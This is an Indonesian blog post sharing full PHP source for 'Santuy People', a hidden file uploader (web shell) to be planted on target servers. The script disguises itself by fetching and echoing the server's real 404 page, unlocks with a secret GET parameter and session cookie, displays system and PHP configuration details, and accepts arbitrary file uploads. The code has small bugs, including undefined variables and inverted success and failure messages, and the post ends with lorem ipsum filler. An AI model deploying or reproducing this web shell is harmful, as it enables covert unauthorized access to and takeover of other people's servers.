Santuy People - Super Hidd3n Uploader


-

Hai sobat

Saya ikal,

Disini saya akan share sesuatu nih.

-


Sudah lumayan lama saya tidak membuat artikel lagi, Ya gitu lah.


Okeh kita langsung saja masuk kepembahasan.


Untuk tampilannya kira - kira seperti gambar dibawah ini : 



Nah untuk tampilannya sangat sederhana yah. Namun yang membuatnya menarik bukan itu :D. Oke kita ke fiturenya.


Fiture :

  1. Hidden.
    •  Use get method.
    •  Use Session (Cookies).
    •  Tampilan 404 sebelum memanggil request GET.
  2. Get System.
  3. Get PHP Version.
  4. Get Server name.
  5. dll

 

Sedikit detail lagi nih, 

- Jadi saat kalian belum memanggil requestan getnya, uploader akan berpenampilan 404, Tampilan 404 nya beragam, atau bisa dibilang (Menyesuaikan dengan tampilan 404 server target kalian).

- Dan cara memanggil uploadernya cukup mudah, 

Example : https://localhost/uploader.php?1337=1337

- Karena ini menggunakan session, jadi jika kalian sudah pernah memanggil uploadernya sekali, kalian tidak perlu mengaksesnya lagi menggunakan get methode. Kecuali jika kalian membersihkan cache browser :D.


Source Code : 


<?php
  error_reporting(0);
  ini_set('max_execution_time',0);
  session_start();
  $name="1337";
  function login() { 
    $random_url = mt_rand(1000000, 247345736453);
    $curl = curl_init();
    $protocol = 'http://';
    if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off') { $protocol = 'https://'; }
    curl_setopt($curl, CURLOPT_URL, $protocol . $_SERVER['HTTP_HOST'] . '/' . $random_url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    $server_404 = curl_exec($curl);
    $server_404 = str_replace("/{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
    $server_404 = str_replace("{$random_url}", $_SERVER['SCRIPT_NAME'], $server_404);
    echo $server_404;
    exit;
  }
  if (!isset($_SESSION[md5($sexy)]))
    if (isset($_GET[$name]) && ($_GET[$name] == $name))
      $_SESSION[md5($sexy)] = true;
  else login();
?>
<?php
echo"
<meta name='theme-color'content='#000000'>
<style>
body{
	background:#202020;
	color:#00D5C6;
	text-align:center;
	font-family:Arial;
}
</style>";
$uname = php_uname();
$serversoftware = $_SERVER['SERVER_SOFTWARE'];
$servername = $_SERVER['SERVER_NAME'];
$serverip = $_SERVER['SERVER_ADDR'];
$safemode = ini_get('safe_mode') ? "Enabled" : "Off";
$openbasedir = ini_get('open_basedir') ? "Enabled" : "Off";
$disabledfunc = ini_get('disable_functions');
$phpversion = phpversion();
$domain = $_SERVER['HTTP_HOST'];
echo "<br><br><center>";
echo"
<font color='white'><h1>SANTUY PEOPLE </h1>
<img src='https://img.shields.io/badge/Version-1.1.1-brightgreen.svg?style=style=flat-square' alt='version'>
<br><p align='left'>
		System:<font color='lime'>	$uname </br></font>
		PHP Version:<font color='lime'>$phpversion<br></font>
		Server Name:<font color='lime'>$servername </font><br>
		Server IP:<font color='lime'>$serverip<br></font>
		safe_mode:<font color='lime'>$safemode<br></font>
		open_basedir:<font color='lime'>$openbasedir<br></font>
		Disabled Functions:<font color='lime'>$disabledfun<br></font>
";    
echo "<center><form method='post' enctype='multipart/form-data'>
<input type='file' name='x'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
	if(@copy($_FILES['x']['tmp_name'], $_FILES['x']['name'])) {
	echo "Failed";
	} else {
	echo "Success";
	}
	}
?>


Nah segini saja tutorial kali ini, kurang lebihnya biarkan saja :D. 


Thanks

See U

Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.